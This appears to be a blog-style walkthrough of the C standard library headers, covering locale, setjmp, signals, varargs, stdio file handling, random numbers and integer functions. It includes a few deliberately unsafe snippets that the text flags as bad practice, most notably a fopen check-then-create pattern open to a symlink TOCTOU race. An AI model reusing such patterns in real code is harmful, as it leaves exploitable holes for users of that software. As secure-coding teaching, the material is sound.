The shifted pointer allows EOF (-1) to be looked up easily without undefined behavior. The expression _Ctype[EOF] means _Ctype[-1], which is the same as *(ctyp_tab+1-1), which does not attempt to dereference, or even point to, memory before a primary data object. Pointers may only be assigned addresses inside a data object or one element past its end. (Data objects are arrays, structures, or regions allocated from the heap. See Rabinowitz’s book for a good discussion of this.) Character codes 128-255 are interpreted as negative numbers when considered as signed char. C does not specify whether char is signed or unsigned (it varies by platform). When char is signed, beware of converting it to int for the ctype functions. The integral promotion will “sign-extend,” creating a negative int value.
This is not suitable for ctype functions, which require int values that are either representable as unsigned char or equal to the special EOF value. To avoid sign extension, cast char values to unsigned char in calls to ctype functions.

errno.h

Errno is the mechanism everyone loves to hate. The X3J11 committee wanted to remove it but decided not to make such a radical departure from existing practice. In the early drafts of the standard it was kept in stddef.h, but the committee decided that stddef.h should exist in freestanding environments, so they split errno.h off into its own header.

Not much to say about it. The errno variable is set to zero at program startup. Library functions can set it to nonzero values but never set it to zero themselves. To use it, explicitly set it to zero yourself, call a library function, then check whether errno changed.

One interesting tidbit is that errno is sometimes not a global variable at all, but a macro for (*_Error()). Having to set a real data object immediately after performing hardware floating point operations would break the FPU pipeline. Deferring the check until it is requested through this _Error() function doesn’t break the pipeline.

float.h, limits.h, and math.h

Both float.h and limits.h are inventions of the committee. You can generate them with the enquire program written by Steven Pemberton. It performs runtime checks on the data types to find information about them, then generates the desired header file. It’s extremely portable. It also detects and outputs information about the representation of base types, like endianness.

I decided not to slow down to study these headers in depth because I lack the knowledge of floating point representation necessary to understand the internals of the functions. I do know the definitions and parameters in float.h were recommended by numerical analysts on the Committee.
The set was chosen so as not to prejudice an implementation’s selection of floating-point representation. The math functions are written carefully to avoid overflow and underflow. I’ll revisit the topic after studying Michael Overton’s short book, “Numerical Computing with IEEE Floating Point Arithmetic.”

locale.h

Changing a program’s locale tells it how to handle local customs. There are multiple locale categories that can be adjusted independently. They control different things, like the codeset used by ctype, the desired date or monetary formatting, or alphabetical sort order. Typically all categories are set to the same locale. The alternative, a so-called “mixed locale,” is less common.

Some of the settings are meant for interpretation by your own program, and others automatically affect the C standard library. For example, when parsing a double, strtod checks what the current locale uses for a decimal point symbol. Even if you want to avoid ctype and use a third-party Unicode library, some of the locale information is still useful for your program.

By default C programs use the “C” locale, which is ASCII text and American formatting. The most respectful thing, though, is to accept the locale in all categories as set by system environment variables. This is indicated by the empty string for the locale name.

```c
#include <locale.h>
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    if (setlocale(LC_ALL, "") == NULL) {
        fputs("Unable to select system locale\n", stderr);
        return EXIT_FAILURE;
    }
    /* ... */
    return EXIT_SUCCESS;
}
```

To see what locales are known on your local system, run locale -a. There are 203 installed on MacOS. The list begins with:

```
en_NZ
nl_NL.UTF-8
pt_BR.UTF-8
fr_CH.ISO8859-15
eu_ES.ISO8859-15
en_US.US-ASCII
af_ZA
…
```

They are in the format [language[_territory][.codeset]]. OpenBSD has chosen to support only the “C” (aka “POSIX”) and “UTF-8” codesets, but supports many languages and territories in the other locale categories.
Unicode subsumes all those partial character encodings, so BSD just wanted to eliminate a source of complexity.

One way to see locales in action is by setting environment variables and using Unix tools. We can change sort order using LC_COLLATE:

```sh
cat <<EOF >cn.txt
我
喜
歡
整
理
單
詞
EOF

LC_COLLATE=C sort <cn.txt
LC_COLLATE=zh_CN.UTF-8 sort <cn.txt
```

The two orderings, side by side:

```
zh_CN.UTF-8    C
理             喜
我             單
詞             我
歡             整
整             歡
喜             理
單             詞
```

Setlocale() doesn’t play well with threads because it updates an internal global variable. Set the locale before spawning threads.

One other random nugget of wisdom from the book, unrelated to locales but mentioned in that chapter, is to use a tool to visualize the call tree in a C program. This can help you understand a new codebase. Try cflow. See also Steve Summit’s C FAQ question 18.1.

setjmp.h

The setjmp/longjmp functions create a “saveable goto” statement to return to places you’ve already been. They allow jumping from one function into another. They are like the C programmer’s version of exception handling. Setjmp and longjmp are very tricky inside, as they have to save and restore variables, arguments, registers, etc. to resume execution in another location.

```c
#include <setjmp.h>
#include <stdio.h>

void dostuff(void);

jmp_buf target;

int main(void)
{
    if (setjmp(target) == 0) {
        puts("Saved the target, continuing on.");
        dostuff();
    } else
        puts("I feel like I've been here before...");
    return 0;
}

void dostuff(void)
{
    longjmp(target, 42);
}
```

To indicate that the jmp_buf was set, setjmp returns 0. When execution jumps back to this point, setjmp returns the value passed as the second argument to longjmp, in our case 42. The same if statement is evaluated again but with a different result, like waking up in an alternate universe.

As simple as this looks, it’s easy to break. The statement containing setjmp must be very simple. Calling setjmp in the controlling expression of an if or switch statement is fine, but you should not save the return value like n = setjmp(...).
An assignment statement is too complicated and can disturb the sensitive machinery. The function containing setjmp should be as simple as possible. Local variables modified between the setjmp and longjmp calls have indeterminate values after the jump unless they are declared volatile. Generally it’s best to execute the real processing in another function called when setjmp returns 0.

Longjmp should not be called from an exit handler (i.e., a function registered with the atexit function). Finally, it’s undefined behavior to attempt to longjmp to a function that has since returned. Thus longjmp’s usual use case is like exceptions in other languages, going back up the call chain and skipping intermediate functions.

The jmp_buf type is actually an array behind a typedef, which is why it’s passed to setjmp without an ampersand. The standard forbids jmp_buf from being implemented as a scalar or struct.

Given all these caveats, the committee considered requiring compilers to recognize calls to setjmp as a special case. Then the function could work in all types of statements. However, they decided against it for consistency, because they don’t require any other function to be a special case (although they allow compiler writers to make special cases as desired).

signal.h

Signals are a UNIX technique for interprocess communication that causes a process to asynchronously call a handler function, or else take a default action. Programs also receive “synchronous” signals for their own logical exceptions like division by zero, segmentation faults, or floating point problems.

The ANSI committee decided to standardize a weakened, portable version of signal functionality. Portable signal handlers can do very little. Here’s a typical example of what a handler can do safely:

```c
#include <signal.h>

/* a global */
volatile sig_atomic_t intflag = 0;

/* SIGINT handler */
void field_int(int sig)
{
    signal(SIGINT, &field_int);
    intflag = 1;
    return;
}
```

It does as little as possible, simply setting a global variable which regular code can check at leisure.
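One portable way to exercise a handler like this without a terminal is to deliver the signal synchronously with raise(), which does not return until the handler has. The sketch below mirrors the handler above under hypothetical names (demo_intflag, demo_field_int, demo_check_sigint) and restores the default action afterward.

```c
#include <signal.h>

/* the shared flag: volatile, and atomically accessible */
static volatile sig_atomic_t demo_intflag = 0;

/* same shape as field_int above: re-arm, set the flag, return */
static void demo_field_int(int sig)
{
    signal(sig, demo_field_int);  /* re-install on systems that reset to SIG_DFL */
    demo_intflag = 1;
}

/* Install the handler, send SIGINT to ourselves, and report the flag:
 * 1 if the handler ran, -1 if installing or raising failed. */
int demo_check_sigint(void)
{
    int result;

    demo_intflag = 0;
    if (signal(SIGINT, demo_field_int) == SIG_ERR)
        return -1;
    if (raise(SIGINT) != 0)  /* returns only after the handler does */
        return -1;
    result = demo_intflag;   /* "regular code" reading the flag */
    signal(SIGINT, SIG_DFL); /* restore the default action */
    return result;
}
```

In a real program the check would happen at a convenient point in a main loop rather than right after raise(); the structure of handler and flag is the same.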
One thing to note is that it re-installs itself in the very first line with the signal() function. That’s because on some platforms (like Linux), as soon as a signal is handled, the handler reverts to the default, which in the case of SIGINT terminates the program. Other systems such as BSD leave a handler installed when it is called. On Linux this would be an unwise thing to do:

```c
void field_int_badly(int sig)
{
    /* open a window where a repeat signal could
     * hit the default handler before we reinstall */
    sleep(1);
    signal(SIGINT, &field_int_badly);
    intflag = 1;
    return;
}
```

Even our earlier technique of calling signal() right away in the handler isn’t completely safe. The CERT C Coding Standard warns that this leaves a tiny window open for a race condition. They suggest not using the C library signal functionality at all, but the equivalent POSIX functions instead. POSIX allows you to specify persistence of the handler during initial registration.

Another thing to note is the type declaration of the shared flag (that we called intflag in the example). Signal handlers should read and write only volatile variables. For asynchronous signals, volatile alone isn’t even enough. The variable should be small enough that it can be read or written atomically by the processor. The C standard provides the sig_atomic_t typedef for this. Each standard library implementation defines it as an alias for a suitably small integral type. If you’re writing portable code, don’t assume that sig_atomic_t is anything bigger than a char, and don’t assume its signedness. Thus the portable value range is 0…127, although C99 added macros (SIG_ATOMIC_MIN and SIG_ATOMIC_MAX in stdint.h) to determine its min and max values.

The standard says not to call any standard library functions from a signal handler except abort(), exit(), longjmp() or signal(). Certainly avoid any functions that interact with state, like those performing I/O, or else stdio streams can become corrupted.
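CERT’s suggested alternative can be sketched with POSIX sigaction(). This goes beyond ISO C and assumes a POSIX system; the feature-test macro and the names demo_flag, demo_on_int and demo_install_persistent are assumptions of this sketch. Because SA_RESETHAND is left out of sa_flags, the handler stays installed, so it never needs to re-arm itself and the race window described above does not exist.

```c
#define _POSIX_C_SOURCE 200809L  /* expose sigaction in strict ISO modes */
#include <signal.h>
#include <string.h>

static volatile sig_atomic_t demo_flag = 0;

/* only sets the flag; no signal() call needed to stay installed */
static void demo_on_int(int sig)
{
    (void)sig;
    demo_flag = 1;
}

/* Install demo_on_int for SIGINT. Returns 0 on success, -1 on error. */
int demo_install_persistent(void)
{
    struct sigaction sa;

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = demo_on_int;
    sigemptyset(&sa.sa_mask); /* block no extra signals while handling */
    sa.sa_flags = 0;          /* no SA_RESETHAND: the handler persists */
    return sigaction(SIGINT, &sa, NULL);
}
```

Raising SIGINT twice after installation is a quick way to confirm persistence: if the handler had been reset after the first delivery, the second would terminate the process.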
Even though the C standard says it’s OK to call longjmp from a signal handler, CERT gave an example where doing so caused a vulnerability [VU #834865] in Sendmail, because it allowed attackers to exploit a race condition in main() by timing signals.

A program can raise signals for itself with the raise() function. (It used to be called kill.) However, longjmp() is less tricky than raising signals for yourself and should be preferred.

The standard library defines this limited list of signals:

- SIGABRT: abnormal termination, such as is initiated by the abort function
- SIGFPE: an erroneous arithmetic operation, such as zero divide or an operation resulting in overflow
- SIGILL: detection of an invalid function image, such as an illegal instruction
- SIGINT: receipt of an interactive attention signal
- SIGSEGV: an invalid access to storage
- SIGTERM: a termination request sent to the program

Using other signals makes a program less portable.

stdarg.h

On the PDP-11 it was easy to walk function arguments with a pointer. The memory layout of arguments was well known, the size of pointers was the same as the size of int, and the original C language could not pass structures by value. However, as C spread to other architectures, it benefited from a portable way to access variable numbers of arguments. Non-PDP architectures had complex calling conventions. Using a library for variadic arguments makes code clearer too, whether or not portability is an issue.

Pre-ANSI C on UNIX used <varargs.h>, which required a final “dummy argument.” ANSI C got more picky about arguments matching a declaration, and introduced the “...” token to take the place of the dummy argument, which breaks varargs. The “...” also signals to a compiler that it may want to change the function calling convention. The committee turned varargs.h into stdarg.h, and generalized the macros to the extent that all known C implementations would be able to handle them with little modification.
This functionality was important for other functions in the standard library like printf and scanf.

Using the library is pretty easy: just initialize the list based on the final fixed argument, loop through the args, and release the list.

```c
#include <stdarg.h>

/* add a list of n numbers */
int sum(int n, ...)
{
    va_list ap;
    int s;

    va_start(ap, n);
    for (s = 0; n > 0; --n)
        s += va_arg(ap, int);
    va_end(ap);
    return s;
}
```

It is undefined behavior to call va_arg() more times than there are arguments, so the function needs to determine the number of arguments by other means. Our function above consults the n parameter for that information.

Speaking of the n variable, we’re not actually passing its value to va_start(), much as it may look that way. The va_start macro manipulates “n” merely as a name, so it can calculate the address of the next argument. Both va_start and va_arg must be implemented as macros, not as functions.

These are the portable assumptions for using stdarg.h:

- The variadic function must declare at least one fixed argument.
- The function must call va_end before returning (for cleanup on some architectures).
- va_arg can deal only with those types that become pointers by appending “*” to them. Thus register variables, functions, and arrays can’t be returned by va_arg.
- If a type widens with default argument promotions, then va_arg should request the widened type.

The last point requires some explanation. When functions had no prototypes in pre-ANSI C, the compiler would promote smaller types to wider ones when sending them to functions. That’s because doing so is essentially free: it costs more to put a byte in a register than to put a word in. Although ANSI introduced prototypes, the promotion rule still applies to variadic arguments. Char and short get expanded to int, and float gets promoted to double. Thus to accept a char argument, ask for its value with va_arg(ap, int) and then cast to char. Don’t do va_arg(ap, char).
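Here is a sketch of the promotion rule in practice, using hypothetical function names: demo_count_char receives char arguments, which arrive as int, and demo_average receives float arguments, which arrive as double. The last fixed parameter before the “...” is an int in both cases; the standard makes va_start undefined if that parameter has a type that changes under promotion, such as char or float.

```c
#include <stdarg.h>

/* Count how many of the n variadic char arguments equal target.
 * Each char was promoted to int by the caller, so request int. */
int demo_count_char(int target, int n, ...)
{
    va_list ap;
    int hits = 0;

    va_start(ap, n);
    while (n-- > 0) {
        char c = (char)va_arg(ap, int);  /* not va_arg(ap, char) */
        if (c == (char)target)
            ++hits;
    }
    va_end(ap);
    return hits;
}

/* Average n variadic float arguments, which arrive as double. */
double demo_average(int n, ...)
{
    va_list ap;
    double total = 0.0;
    int i;

    if (n <= 0)
        return 0.0;
    va_start(ap, n);
    for (i = 0; i < n; ++i)
        total += va_arg(ap, double);  /* not va_arg(ap, float) */
    va_end(ap);
    return total / n;
}
```

Callers pass ordinary char and float variables; the promotions happen automatically at the call site, so only the callee has to remember them.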
To pass a va_list to another function for continued processing, either a) memcpy it if you want to consume all arguments in the current function, or b) pass a pointer to it if the called function should consume some or all of the arguments. C99 added va_copy() for the first scenario.

The implementation of stdarg.h macros is gnarly and entirely platform specific. On my system they resolve to builtin compiler functions.

stddef.h

Stddef.h is a catchall place for definitions, sort of like stdlib.h. Why make two headers rather than combine them into one? It’s because C can be compiled in either a “hosted” or a “freestanding” environment. The latter is for embedded programming where there isn’t enough room for the entire standard library. An implementation must include all the standard library headers to be considered a hosted environment, while a freestanding environment must include only float.h, limits.h, stdarg.h, and stddef.h. The committee deliberated about putting the things in stddef into the C language itself, but decided the need to extend C wasn’t quite there.

Stddef provides ptrdiff_t, size_t, wchar_t, NULL, and offsetof(structname, attrib). Only ptrdiff_t and offsetof are unique to this header. Other headers usually contain duplicates of the other definitions.

I used to think that NULL was a reserved word in C, but have come to learn that the constant 0 is actually the crux. The compiler treats 0 specially in a pointer context and transforms it to whatever value represents the null pointer on the given architecture (which needn’t be bitwise zero). Thus NULL is typically a macro for ((void *)0). Even though data pointers needn’t be the same size as function pointers, ((void *)0) still counts as a null pointer constant, so the standard allows assigning it to a function pointer. Casting zero explicitly, e.g. (int (*)(void))0, makes the intent obvious.

The typedef size_t is an unsigned integral type big enough to hold the size of the largest possible object in memory.
In some systems that might not be very large, for instance only 64k in the segmented memory model on the Intel 80286. Related rule of thumb: if a variable is going to index an array, it should be of type size_t.

The typedef ptrdiff_t is the signed integral type of the result of a pointer subtraction. It’s signed because if (p - q) is positive then (q - p) will be negative. Note that if size_t is already the largest integer type, then ptrdiff_t can be no larger, yet the latter loses one bit to hold the sign. So it’s possible to make an array with cells too far apart for ptrdiff_t to measure. (Assuming there is room in memory for such a large single array.)

C99 provides a macro SIZE_MAX with the maximum value possible in size_t. C89 doesn’t have it, although you can obtain the value by casting (size_t)-1. Despite appearances, this doesn’t depend on two’s complement: converting a negative value to an unsigned type is defined as wrapping modulo 2^N, so (size_t)-1 is the largest size_t value on any architecture.

The offsetof() macro can determine the offset in bytes of a member within its structure. This cannot easily be determined otherwise due to structure padding. The C99 rationale talks about using it to provide “generic” routines that work from descriptions of the structures, rather than from the structure declarations themselves. On many platforms it is defined as:

```c
#define offsetof(type, field) ((size_t)(&((type *)0)->field))
```

That’s undefined behavior, but that’s what the standard library is for: a portable way to do sometimes non-portable operations.

stdio.h

UNIX I/O was clean and simple compared with other systems of its day. It was 8-bit clean, and used a consistent line terminator. At the edges ioctl() would translate the simple I/O streams for the idiosyncrasies of attached devices.
The kernel would hold file control state internally and give programs a simple integer descriptor to use when reading and writing.

Leaving UNIX, C ran up against the complexity of I/O on other systems. The X3J11 committee talked with vendors and came away with a sharper understanding of the I/O model they wanted to support.

They had to distinguish text and binary modes. DOS used \r\n for line endings. The \r had to be stripped in text mode but not in binary mode. UNIX ignores binary mode, but you had better enable it for portability when necessary.

UNIX also had an unusually faithful representation of files. You could put bytes in and expect to read them out unchanged. When doing fully portable I/O, keep these caveats in mind:

- A final line without a terminating newline (in text mode) can confuse some systems, and they may drop the line or append a newline.
- Don’t count on the system preserving trailing space in a line. Some systems strip it out.
- Conversely, some systems add a space to a blank line so the line “has something in it.”
- The maximum fully portable line length is 254 characters.
- Implementations are free to pad the end of binary files with a block of NUL characters to make the files match certain disk block sizes.

Another difference between the C standard I/O and UNIX is buffering. In UNIX, people often wrote their own buffering code to reduce the number of relatively costly I/O system calls. The X3J11 committee decided to include this buffering functionality in stdio.

Buffering is an optimization that can be tailored to expected patterns of I/O. The standard library provides the setvbuf() function to change the size and location of a stream’s buffer, as well as to choose between unbuffered, line buffered, and fully buffered modes. At startup, stderr is not fully buffered, while stdin and stdout are fully buffered only when they don’t refer to an interactive device; on a terminal, stdout is typically line buffered. Setvbuf() must be called after a stream is opened but before any other operation on it, to have any chance of working.
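Because setvbuf() must come before any other operation, a safe habit is to call it on the line right after opening. The sketch below uses tmpfile() for a scratch stream; demo_buffered_roundtrip and the 4096-byte size are arbitrary choices for illustration, not recommendations from the book. The buffer is static because the array must remain valid until the stream is closed.

```c
#include <stdio.h>
#include <string.h>

/* Write a line through a fully buffered scratch stream and read it
 * back. Returns 1 if it survived the round trip, 0 if not, -1 on error. */
int demo_buffered_roundtrip(void)
{
    static char buf[4096];  /* must stay valid until fclose */
    char line[32];
    int ok;
    FILE *fp = tmpfile();

    if (fp == NULL)
        return -1;
    /* first operation on the new stream: choose full buffering */
    if (setvbuf(fp, buf, _IOFBF, sizeof buf) != 0) {
        fclose(fp);
        return -1;
    }
    fputs("hello\n", fp);
    /* a positioning call is required between writing and reading */
    if (fseek(fp, 0L, SEEK_SET) != 0) {
        fclose(fp);
        return -1;
    }
    ok = fgets(line, sizeof line, fp) != NULL && strcmp(line, "hello\n") == 0;
    fclose(fp);
    return ok;
}
```

Passing NULL instead of buf would let the library allocate the buffer itself, and _IOLBF or _IONBF select line buffering or no buffering.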
(stdio.h) opening and closing

Perhaps surprisingly, there is a lot to learn about just opening files. First, there may be a limit on how long a filename can be on a system. Stdio provides the FILENAME_MAX macro with this limit. If the system imposes no practical limit then the macro is just a suggested size. This value could be either too short or, paradoxically, too long. If it is set very large then you might end up wasting memory or causing problems if allocating on the stack.

Similarly, L_tmpnam is the size needed for an array large enough to hold a temporary filename generated by tmpnam(). This function is a security hazard (though it can be useful for generating entropy). It introduces a Time of Check, Time of Use (TOCTOU) race condition because another program or thread could obtain the same temporary file name and create the file first. Use the tmpfile() function instead, which actually creates the file and arranges for it to be removed when it is closed or the program exits normally.

Another common TOCTOU happens with fopen() when trying to create but not replace a file. Programs first check existence, right after which an evildoer can create a symlink of the same name in time for the fopen with “w” mode to overwrite another file with possibly elevated permissions.

```c
/* dangerous */
FILE *fp = fopen("foo.txt", "r");
/* <-- attacker gets busy here */
if (!fp) {
    fp = fopen("foo.txt", "w");
    ...
    fclose(fp);
} else
    fclose(fp);
```

C11 fixes this with an “x” (exclusive) mode modifier. If exclusive mode is specified (“wx”), the fopen fails if the file already exists or cannot be created. In C89 you can either go beyond the standard library, using the POSIX open() function with the O_CREAT | O_EXCL flags, or just try to keep the time between check and write as small as possible.

Once you have opened a file to your liking, or have been given a FILE pointer, treat the pointer as totally opaque.
Don’t even try to make a copy of the FILE structure, because some implementations rely on magic memory addresses for these structures. The CERT standard (FIO38-C) says that the following can cause a crash on some platforms if you try to use my_stdout:

```c
/* don't do this */
FILE my_stdout = *stdout;
```

There’s a related function called freopen(), but it’s not used very often. The main use is converting a big program from reading stdin to reading a named file. It’s the simplest way to do that, whereas a new program should just directly fopen whatever file it wants.

During a normal program exit, all open files will be closed. Still, it’s useful to explicitly call fclose() on file handles. It helps avoid exceeding the FOPEN_MAX limit of files that can be open at once. Also, failing to properly close files may allow an attacker to exhaust system resources and can increase the risk that file buffers will not be flushed in the event of abnormal program termination.

Speaking of flushing buffers, fflush() might force items in the buffer to be processed, but there is no guarantee. For convenience, fflush(NULL) flushes all output streams, which is useful in preparation for a possible loss of program control, like going into a dangerous section, or telling the user to turn off the computer.

Two other quirks. Some operating systems will not actually create a file that you fopen() and fclose() unless you write something. Also, you can close stdout or stderr, and there are sometimes reasons to do so!

(stdio.h) file navigation

Stdio.h has two similar pairs of functions to move around in a file: fgetpos/fsetpos and ftell/fseek. Why the duplication? The second pair represents position as a long integer. When the file is opened in binary mode, this long is the number of bytes from the start of the file. This is useful because you can do arithmetic on the integer to jump to particular places. The drawback is that on some systems a long is only 32 bits, so it cannot represent positions in large files.
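A sketch of that arithmetic: write ten bytes to a scratch file, ask ftell() where the stream is, and seek three bytes back from there. tmpfile() opens the file in binary update mode (“wb+”), so the long really is a byte count. demo_seek_arithmetic is a hypothetical name.

```c
#include <stdio.h>

/* Write "0123456789" to a scratch file, then use ftell() arithmetic
 * to jump three bytes back from the end and read that byte.
 * Returns the byte read, or EOF on any failure. */
int demo_seek_arithmetic(void)
{
    FILE *fp = tmpfile();  /* binary update mode, "wb+" */
    long end;
    int c;

    if (fp == NULL)
        return EOF;
    fputs("0123456789", fp);
    end = ftell(fp);  /* byte count from the start: 10 here */
    if (end < 3 || fseek(fp, end - 3, SEEK_SET) != 0) {
        fclose(fp);
        return EOF;
    }
    c = fgetc(fp);    /* the byte at offset 7 */
    fclose(fp);
    return c;
}
```

The call returns '7', the byte at offset 10 - 3. The fseek() also serves as the positioning operation the standard requires between a write and a subsequent read.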
The fgetpos/fsetpos pair works using a special object (of type fpos_t) that can represent positions in huge files. You must treat this object as a magic bookmark. It’s only obtainable from a call to fgetpos; you cannot construct your own to point to a position you haven’t already visited.

Stdio also includes a rewind() function, but don’t use it. It actively clears the error indicator for a stream, and it returns no status of its own. Instead do an fseek(stream, 0L, SEEK_SET).

These navigation commands were interesting to me, so I created a project called randln to experiment with different ways of picking a random line from a text file. You might find it interesting to look at the pros and cons of each method as explained in the readme.

You can actually inspect I/O as it happens. The trick is to walk the program through a debugger while tracing its system calls in another terminal. To use that randln program as an example, first start it in the debugger. Enable tracing for the debugger’s I/O and that of its children.

```sh
ktrace -i -ti gdb randln
```

Put a breakpoint in the line-finding function and start the program. In another terminal, find the PID of randln that was launched by gdb, and start tailing the ktrace dump. This command will show the first 20 bytes of data in each I/O request:

```sh
kdump -m 20 -l -p <pid>
```

Now step through the program in the debugger and watch the consequences of each statement.

A final note about stream navigation and the shell. I noticed that with foo <bar the program can perform fseeks on bar, but with cat bar | foo it cannot. It’s another reason not to abuse cat.

(stdio.h) reading and writing

The foundation of all stream input is fgetc(). The other standard library input functions must behave as if they call it repeatedly, even if they don’t. It pulls a character out of a stream (or a character that was pushed back by ungetc(), if one exists), and refills the stream buffer if needed.
Some platforms allow ungetc() to push back a whole stack of characters, but the portable assumption is that it can store only one.

While fgetc is a function, getc() is usually a macro that avoids incurring a function call just to get a character. The downside is that getc() is allowed to evaluate its argument more than once, so don’t do anything with a side effect there. Now, fgetc() is allowed to be a macro too, but may not be as efficient because it has less freedom in its implementation. It is not permitted to evaluate its argument more than once.

Moving up the food chain we come to gets(), which reads characters into a string until it encounters a newline, with no way to limit how many it stores, so it’s a buffer overflow waiting to happen. It was removed in C11. The fgets() function is better because you can specify a maximum length. However, if a read error occurs, the contents of the array being written are indeterminate. It is necessary to reset the string to a known value to avoid errors in subsequent string manipulation functions.

The fread/fwrite functions work in chunks. My only notes about them are:

```c
/* prefer this */
fread(buf, 1, size*n, stream)
/* over this */
fread(buf, size, n, stream)
```

The second form is worse because its return value counts only complete elements, so you can’t tell whether it also consumed up to size-1 extra bytes of a partial element. Also, some implementations of fread (fwrite) simply call fgetc (fputc) in a loop, whereas others are more optimized. Doing a straight UNIX read (write) can be faster.

The standard library doesn’t allow alternating reads and writes without intervening operations to flush or explicitly position the stream:

- after writing, call fseek(), fsetpos(), rewind(), or fflush() before reading
- after reading, call fseek(), fsetpos(), or rewind() before writing, unless the file is at EOF: a read that hits EOF can be followed immediately by a write

The last thing I wanted to mention about reading and writing is a freak consequence of weird machines.
On some digital signal processors (or more generally on the DeathStation 9000), both char and int are 32 bits. This causes a vulnerability in the common pattern:

```c
int c;
while ((c = getchar()) != EOF)
    ...;
```

There is no extra room in the int type to hold EOF as distinct from a valid character code, so a valid character can make the loop stop early. It’s a high severity bug, a variation of which caused a nasty vulnerability in the bash shell, CA-1996-22. Fine, you say, you don’t plan to target such machines!

```c
#include <limits.h>

#if UCHAR_MAX == UINT_MAX
#error "Your machine is weird."
#endif
```

Also, you’ll be careful not to indicate a parse failure with an unsigned code that converts to the signed value of EOF. Well, the same logic can still trick you in C99 with wide characters if you’re not careful. It works like this: the fgetwc(), getwc(), and getwchar() functions return a value of type wint_t. This value can represent the next wide character read, or it can represent WEOF, which indicates end-of-file for wide character streams. On most implementations, the wchar_t type has the same width as wint_t, and these functions can return a character indistinguishable from WEOF. For this situation be sure to check after the loop for feof() and ferror(). If neither happened, then you’ve received a wide character that resembles WEOF. It’s yet another place where wide character implementations are half baked.

(stdio.h) formatting

Scanf and printf have formatting options I hadn’t seen before. First of all, they can limit the length of strings they read or write.

```c
/* limit to 10 characters */
printf("%.10s", big_string);
/* or limit to n characters */
printf("%.*s", n, big_string);
/* limit to 10 characters (input needs room for 11, including the NUL) */
scanf("%10s", input);
```

I used to think scanf was very unsafe, but this limiting helps. Scanf also supports “scansets” to match strings containing specific characters. Here is how to match up to ten vowels: %10[aeiou]. Scanf also allows you to match but not capture, using *, e.g. %*d.
The %n option saves the number of characters read so far in the scan. Finally, in C99 printf has modifiers for size_t (%zu) and ptrdiff_t (%td). Because they are typedefs which change by architecture, there is otherwise no way to specify them portably.

stdlib.h

Stdlib is a hodgepodge. It has six categories of functions inside:

- algorithms (search, sort, rand)
- integer functions
- number parsing
- multibyte conversions
- storage allocation
- environmental interactions

(stdlib.h) random numbers

Let’s start with an interesting topic: random numbers. The standard library provides a rand() function to generate a pseudorandom sequence starting from a seed specified by srand(). The numbers range from 0 to RAND_MAX.

The first problem is that RAND_MAX can be very small: the standard only guarantees it is at least 32767. The second problem is that the quality of rand() is not very good on most platforms. On Mac OS it is horrible. Changing the random seed by only a small amount (such as seeding by the epoch) leads to similar initial random values.

```
seed        1st rand
1500000000  1189467867
1500000001  1189484674
1500000002  1189501481
1500000003  1189518288
1500000004  1189535095
1500000005  1189551902
1500000006  1189568709
1500000007  1189585516
1500000008  1189602323
1500000009  1189619130
```

Rather than rely on whatever implementation of rand you get on a given architecture, it’s just as easy to define your own xorshift rand function. The one below is due to Chris Wellons, who arrived at the constants through an exhaustive search.

```c
/* must be seeded with a nonzero value: 0 maps to 0 forever */
static unsigned long g_rand_state = 0;

/* assumes 64-bit longs */
unsigned long defensive_rand(void)
{
    g_rand_state ^= g_rand_state >> 30;
    g_rand_state *= 0xbf58476d1ce4e5b9UL;
    g_rand_state ^= g_rand_state >> 27;
    g_rand_state *= 0x94d049bb133111ebUL;
    g_rand_state ^= g_rand_state >> 31;
    return g_rand_state;
}
```

One problem is that these 64-bit constants limit portability. You can portably assume only that longs are at least 32 bits. (C99 gives us long long, which is at least 64 bits, for that.)
Chris provides 32-bit rand functions to choose from as well. Luckily the compiler should fail with an error like “integer literal is too large to be represented in any integer type” rather than accepting the program and creating bugs.

Now we have a good rand() function, but how should we seed g_rand_state with an initial value? The typical way is to gather the epoch from time(NULL), but then the application will use the same seed if run more than once per second. There are two other sources of entropy available from the standard library. One is hashing the path generated by tmpnam(), which in many implementations consults the process ID or a higher precision clock. The second is hashing the address of the main function, which is often fairly unpredictable due to address space layout randomization (ASLR).

Using the address of main numerically is a little tricky. C99 has a type called intptr_t which can hold pointer values as an integer, but this type is for data pointers only, not function pointers, which on some architectures have a different size. We might consider casting a pointer to main as (char *) and reading the bytes, but for the same size reason this isn’t feasible. What we can do is create a function pointer to main, point another pointer at it, and read the value out byte by byte. A pointer-to-function-pointer is just a data pointer and can be cast to (void *).

```c
int (*p)(int, char**) = &main;
unsigned char bytes[sizeof(p) + 1] = { 0 };
memcpy(bytes, (void*)&p, sizeof(p));
```

The bytes array is NUL terminated, but the pointer value itself may contain zero bytes, so hash all sizeof(p) bytes rather than treating the array as a string. To see these techniques in action and how to combine the entropy, check out rand.c.

If you’re willing to use functions beyond the C standard library, POSIX provides a random() function that is higher quality, and OpenBSD provides arc4random() which returns crypto-grade randomness.

(stdlib.h) integer functions

In C89 the rounding of integer division isn’t fully specified.
When either the numerator or the denominator is negative, the result may round either toward zero or downward, matching whatever the underlying hardware does. The committee didn't want to impose overhead on any system whose hardware followed the other convention. In C99 they changed their mind, reasoning that Fortran (known for numerical programming) defines the rounding. C99 rounds toward zero.

To get this behavior in C89, use the div and ldiv functions. They return structures div_t and ldiv_t that contain both the quotient and remainder of the division, and unlike the / operator they are specified to round toward zero. The only reason to use these functions in C99 is efficiency, because they may be implemented with a compiler builtin that computes the quotient and remainder together in a single instruction.

A note about the ato{i,l,f} functions: their behavior is undefined if the input cannot be parsed correctly. They need not even set errno. Except for behavior on error, atoi is equivalent to (int)strtol(nptr, (char **)NULL, 10). The strto{d,l,ul} functions should always be preferred, because they provide proper error reporting and a choice of base.

The implementation of strtod in Plauger's book was very careful about floating point overflow. It processed digits in groups of eight and then combined them into a final result. It also consulted the decimal_point attribute set by the LC_NUMERIC part of the current locale.

(stdlib.h) memory

An interesting bit of history: malloc used to be considered a low-level UNIX function, while calloc ("C alloc") was conceived as the portable C version. However, the committee standardized malloc too, because it has less overhead (it doesn't zero the memory). Nowadays malloc seems to be the more popular of the two. There also used to be a cfree, but it was identical to free and didn't make the cut for ANSI C.

The most flexible allocation function is realloc, because it can simulate both malloc and free.
When passed NULL for the original pointer it behaves like malloc, and in C89, when passed 0 for the requested size it acts like free. (C99 made the zero-size case implementation-defined, so portable code should call free directly.)

(stdlib.h) termination and execution

